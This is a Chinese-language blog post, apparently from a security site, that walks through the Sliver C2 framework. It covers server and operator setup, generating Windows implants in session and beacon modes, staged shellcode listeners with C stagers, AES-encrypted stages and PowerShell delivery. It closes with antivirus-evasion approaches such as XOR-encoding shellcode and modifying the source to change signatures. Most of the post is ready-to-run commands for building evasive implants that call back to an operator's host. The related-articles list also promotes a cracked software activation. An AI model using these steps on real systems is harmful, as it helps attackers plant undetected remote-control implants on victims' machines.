EthanDoctor

免杀对抗-安全工具篇&新型Go架构&C2-Sliver多平台&上线模式&红队集成研究&免杀方向

Ethan医生2周前工具29




#安全工具-新型C2-Sliver使用详解

Sliver C2 是一个开源的跨平台红队框架,采用Go开发,目前特征相对于CS更少!

集成了MSF命令行运行模式,又结合了CS的优势特点,合并提供了两种操作模式

Beacon mode:实现了异步通信方式

Session mode:实现了实时会话方式

优势:

免杀能力强化

模块化多扩展

多操组员模式

开源移植性强

支持多平台(Linux, Windows and MacOS)

 

Implant | 植入物

Listener | 监听器

Sessions | 会话

Beacons | 信标

Armory | 扩展管理器

Multiplayer | 多操作员模式

参考:https://forum.butian.net/share/2243

 

#服务端:

sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

给予执行权限:chmod +x sliver-server_linux

直接执行启用:sudo ./sliver-server_linux

生成连接凭据:new-operator --name xiaodisec --lhost 192.168.139.228

启用多人运动:multiplayer

 

#客户端:

导入凭据:

sliver-client_windows.exe import xiaodisec_192.168.139.228.cfg

再次连接:

sliver-client_windows.exe

 

#生成exe

Session mode:

generate --http http://192.168.139.141:90 --os windows

Beacon mode:

generate beacon --http http://192.168.139.141:90 --os windows -S 5

 

#Session mode(Shellcode)

创建profiles

http -l 9002

profiles new --http 192.168.139.141:9002 --skip-symbols --format shellcode --arch amd64 session_test

创建分阶段监听器

stage-listener --url tcp://192.168.139.141:8443 --profile session_test

创建Stager

generate stager --lhost 192.168.139.141 --lport 8443 --arch amd64 --format c

 

#Beacon mode(Shellcode)

http -l 9003

profiles new beacon --http 192.168.139.141:9003 --skip-symbols --format shellcode --arch amd64 beacon_test(-S 5)

stage-listener --url tcp://192.168.139.141:8003 --profile beacon_test

generate stager --lhost 192.168.139.141 --lport 8003 --arch amd64 --format c

 

#配合C# AES

参考:https://sliver.sh/docs?name=Stagers

http -l 9004

 都是使用Ethsec这个名称 壹起绑定

profiles new beacon --http 192.168.233.130:9004 --skip-symbols --format shellcode --arch amd64 Ethsec

stage-listener --url http://192.168.233.130:8004 --profile Ethsec --aes-encrypt-key ethsecdoctor1234(密钥16位)--aes-encrypt-iv heyheyheyheyheyh(偏移量16位)

image.png

  • AES-128 需要:

    • Key(密钥):16 字节(128 位)

    • IV(初始化向量):16 字节(128 位)

  • AES-256 需要:

    • Key(密钥):32 字节(256 位)

    • IV(初始化向量):16 字节(128 位)


#配合PowerShell

参考:https://forum.butian.net/share/2275

profiles new beacon --http 192.168.233.130:9005 --skip-symbols --format shellcode --arch amd64 pstest

http -l 9005

stage-listener --url http://192.168.139.141:8005 --profile pstest

 

#安全工具-新型C2-Sliver免杀方向

1、同CS一样针对ShellCode处理

generate stager --lhost x.x.x.x --lport xx --format raw

file_fl_xor.cpp

2、源码级别的二开魔改打乱特征

-默认生成的模版

-Profile流量模版

-改动工具执行调用链







标签: C2-Sliver
返回列表

上一篇:免杀对抗-安全工具篇&MIMiKatz&提权EXP&非源码修改方式&PE转ShellCode& 融入加载

下一篇:Web攻防-大模型应用&LLM安全&提示词注入&不安全输出&代码注入&直接间接&数据投毒

相关文章

nmap与arp-scan功能对比分析

nmap与arp-scan功能对比分析

nmap 和 arp-scan 都是网络扫描工具,但它们在功能、原理和使用场景上有显著区别。以下是主要差异:1. 协议层不同arp-scan:工作在数据链路层(...

免杀对抗-安全工具篇&魔改二开CS&CheckSum8算法&Beacon密钥&Stager流量&生成机制

➢ 安全工具-CS魔改二开-Checksum8算法➢ 安全工具-CS魔改二开-Beacon默认密钥➢ 安全工具-CS魔改二开-PowerShell混淆融入#去除check...

Metasploit Framework (MSF) 使用详解

Metasploit Framework (MSF) 是一款开源的渗透测试框架,广泛应用于网络安全领域。以下是MSF的详细使用指南:一、MSF基础1. 安装与启动Kali Linux:预装MSF,可直...

免杀对抗-安全工具篇&MIMiKatz&提权EXP&非源码修改方式&PE转ShellCode& 融入加载

免杀对抗-安全工具篇&MIMiKatz&提权EXP&非源码修改方式&PE转ShellCode& 融入加载

首先,你需要分析:1、安全工具是否有源代码2、安全工具源代码逻辑复杂程度3、当前源代码你是否有能力修改其次,你需要考虑:1、无源码或无能力修改2、各种异常bug打包问题3、修改打包后效果也不太好故:1...

C2 (Command and Control) 产品概述

C2 (Command and Control) 产品是网络安全领域中用于指挥控制的框架或平台,主要用于渗透测试、红队演练和安全研究。以下是市面上常见的C2产品分类和代表工具:开源C2框架Cobalt...

最新 jetbrains全家桶2024.1.6 激活(亲测可用)

最新 jetbrains全家桶2024.1.6 激活(亲测可用)

注意:接下来本文分享免费激活 PhpStorm 等Jetbrains全家桶工具,一直支持到最新版本2024.1.6。JetBrains全家桶2024.1.6激活方法 - 永久授权教程1.下载...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号